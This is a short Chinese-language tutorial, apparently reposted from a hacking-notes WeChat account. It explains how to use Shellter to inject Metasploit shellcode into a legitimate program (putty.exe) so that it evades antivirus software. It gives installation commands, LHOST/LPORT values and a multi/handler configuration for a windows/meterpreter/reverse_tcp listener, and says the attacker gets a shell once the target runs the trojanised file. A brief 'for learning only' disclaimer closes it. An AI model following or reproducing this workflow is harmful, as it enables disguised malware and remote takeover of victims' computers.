
点击上方蓝字,关注我们
Shellter
是一个 shellcode 注入工具。它有效地重新编码有效负载(此处为外壳代码)以绕过防病毒(AV)软件。Shellter已被证明是Windows 32位应用程序的PE(可移植可执行文件)文件格式的第一个动态感染者。要使用Shellter,您可以创建自己的shellcode,也可以从Metasploit等框架中创建一个shellcode。Shellter 嵌入了一个 32 位 Windows 应用程序和 shellcode。
🚸安装
在kali Linux
中我们可以利用下面命令直接安装
apt-get install shellter
apt-get install wine32
需要注意的是,在安装wine32时,如果你的kali是64位的,我们还需要i386
环境。
dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32
🎉运行Shellter
在终端执行命令Shellter
Shellter时,它会提示您选择操作模式。
选择模式为a
。
现在,您需要选择一个可执行文件并将其复制到Shellter
文件夹。要将 Shellter
与.exe
文件绑定。在这里我们以putty.exe为列。当系统要求您输入 PE 目标时,请键入以下命令:
/root/Downloads/putty.exe
在经过一番复杂的编码加密注入后,下面要求我们选择一种 payload
或 自定义使用 payload
。
set LHOST :192.168.15.135
set LPORT :4444
当我们回车后,shellter 就会自动帮我们生成 shellcode 并自动退出程序。
我们在当前目录下 使用 ls -l
命令进行查看,可以看到 putty.exe 已被成功注入。
接着我们在 kali 上启动 MSF
,配置反弹会话的handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.135
set port 4444
exploit
此时只要当目标成功运行,经我们注入的 shellcode 程序,我们就能取得目标的 shell
🐼总结
当然,shellter
并不是所有的软件都可以对其注入。只有存在注入漏洞才可以!当然本文的宗旨是以学习为目的,请勿恶意为之!
更多文章 关注我们
原文始发于微信公众号(kali黑客笔记):利用Shellter注入 实现免杀
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/152698.html